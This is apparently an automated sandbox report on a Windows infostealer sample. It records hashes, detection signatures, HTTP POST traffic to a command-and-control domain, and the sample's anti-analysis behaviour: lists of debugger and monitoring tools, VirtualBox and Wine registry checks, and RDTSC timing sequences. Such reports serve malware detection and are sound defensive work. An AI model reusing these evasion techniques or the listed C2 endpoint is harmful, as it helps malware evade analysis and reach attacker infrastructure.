Windows Analysis Report
BkB1ur7aFW.exe

Overview

General Information

Sample name: BkB1ur7aFW.exe
renamed because original name is a hash value
Original sample name: 5fad6c65b553ca73463694390e2f9301.exe
Analysis ID: 1581386
MD5: 5fad6c65b553ca73463694390e2f9301
SHA1: 7a624d02450205c7a89d6397979486873b47be39
SHA256: bad2c4c499a3bb89e8098f5fe7b43cdb248d6e70bb23a07de1ebb83fac880175
Tags: exe, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BkB1ur7aFW.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\BkB1ur7aFW.exe" MD5: 5FAD6C65B553CA73463694390E2F9301)
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: BkB1ur7aFW.exeAvira: detected
Source: BkB1ur7aFW.exeReversingLabs: Detection: 47%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: BkB1ur7aFW.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0041DCF0
Source: BkB1ur7aFW.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: BkB1ur7aFW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003F255D
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003F29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444891
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F7770 recv,0_2_003F7770
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444891
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:53:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:53:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2025901050.00000000016FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: BkB1ur7aFW.exe, 00000000.00000003.1987530704.0000000001732000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2026953073.0000000001734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: BkB1ur7aFW.exe, 00000000.00000003.1987530704.0000000001732000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2026953073.0000000001734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0oot%
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: BkB1ur7aFW.exe, 00000000.00000002.2025901050.00000000016FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862j
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: BkB1ur7aFW.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: BkB1ur7aFW.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: BkB1ur7aFW.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: BkB1ur7aFW.exeStatic PE information: section name: .idata
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BB1800_2_004BB180
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004005B00_2_004005B0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00406FA00_2_00406FA0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0077E0500_2_0077E050
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0077A0000_2_0077A000
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004010E60_2_004010E6
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004C00E00_2_004C00E0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004562100_2_00456210
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BC3200_2_004BC320
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0075D4300_2_0075D430
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004C04200_2_004C0420
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007635B00_2_007635B0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003FE6200_2_003FE620
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BC7700_2_004BC770
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007567300_2_00756730
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007817A00_2_007817A0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007747800_2_00774780
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004A98800_2_004A9880
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004049400_2_00404940
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004AC9000_2_004AC900
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_007499200_2_00749920
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003FA9600_2_003FA960
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00773A700_2_00773A70
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_005C6AC00_2_005C6AC0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00768BF00_2_00768BF0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003FCBB00_2_003FCBB0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00431BE00_2_00431BE0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00761BD00_2_00761BD0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00757CC00_2_00757CC0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0077CC900_2_0077CC90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00774D400_2_00774D40
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_005B0D800_2_005B0D80
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00405DB00_2_00405DB0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0076CD800_2_0076CD80
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_0070AE300_2_0070AE30
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00403ED00_2_00403ED0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00415EB00_2_00415EB0
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00414F700_2_00414F70
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004BEF900_2_004BEF90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_004B8F900_2_004B8F90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_00742F900_2_00742F90
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003F73F0 appears 86 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 005CCBC0 appears 95 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003F75A0 appears 530 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 00434FD0 appears 182 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003FCAA0 appears 40 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 003F71E0 appears 42 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 005A7220 appears 88 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 00434F40 appears 174 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 0040CCD0 appears 38 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 004D44A0 appears 72 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 004350A0 appears 31 times
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: String function: 0040CD40 appears 40 times
Source: BkB1ur7aFW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: BkB1ur7aFW.exeStatic PE information: Section: gjdrirkr ZLIB complexity 0.9943839819813248
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003F255D
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F31D7 CreateToolhelp32Snapshot,CloseHandle,0_2_003F31D7
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: BkB1ur7aFW.exeReversingLabs: Detection: 47%
Source: BkB1ur7aFW.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: BkB1ur7aFW.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSection loaded: kernel.appcore.dllJump to behavior
Source: BkB1ur7aFW.exeStatic file information: File size 4426752 > 1048576
Source: BkB1ur7aFW.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: BkB1ur7aFW.exeStatic PE information: Raw size of gjdrirkr is bigger than: 0x100000 < 0x1ac600

Data Obfuscation

Source: C:\Users\user\Desktop\BkB1ur7aFW.exeUnpacked PE file: 0.2.BkB1ur7aFW.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gjdrirkr:EW;agpnebbv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gjdrirkr:EW;agpnebbv:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: BkB1ur7aFW.exeStatic PE information: real checksum: 0x443078 should be: 0x4396cc
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: BkB1ur7aFW.exeStatic PE information: section name: .idata
Source: BkB1ur7aFW.exeStatic PE information: section name:
Source: BkB1ur7aFW.exeStatic PE information: section name: gjdrirkr
Source: BkB1ur7aFW.exeStatic PE information: section name: agpnebbv
Source: BkB1ur7aFW.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01789972 push esp; iretd 0_3_017899B9
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178FB68 push cs; ret 0_3_0178FB69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01789B22 push cs; iretd 0_3_01789B69
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178B818 pushad ; retf 0_3_0178B819
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178BFF8 pushfd ; retf 0_3_0178BFF9
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178B298 push eax; ret 0_3_0178B299
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178F990 push ecx; ret 0_3_0178F991
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0178B980 push ebx; retf 0_3_0178B981
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01799561 push edx; retf 0_3_01799596
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01798D10 push edx; retf 0_3_01798FE6
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_0179A9E6 push C297A2DCh; iretd 0_3_0179A9EB
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017991D8 push edx; retf 0_3_01799216
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_017995A0 push edx; retf 0_3_0179996E
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_3_01797596 push eax; retf 0_3_01797597
Source: BkB1ur7aFW.exeStatic PE information: section name: gjdrirkr entropy: 7.954844497774828

Boot Survival

Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8EC47 second address: C8EC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C8EC4D second address: C8EC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C93673 second address: C9368E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007FD13CB4AF04h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C9368E second address: C936A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FD13D063716h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C936A2 second address: C936A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98BAB second address: C98BC6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FD13D063716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD13D06371Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98BC6 second address: C98BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD13CB4AEF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C38078 second address: C3808B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD13D063716h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C3808B second address: C38090 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C38090 second address: C38096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C984BA second address: C984C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C984C6 second address: C984CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98761 second address: C98765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98765 second address: C9877D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13D06371Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C9877D second address: C98781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98781 second address: C98785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C98785 second address: C9878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2EF0 second address: CA2EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2EF8 second address: CA2F2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13CB4AF06h 0x00000008 jmp 00007FD13CB4AF09h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2F2C second address: CA2F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD13D06371Dh 0x0000000c rdtsc
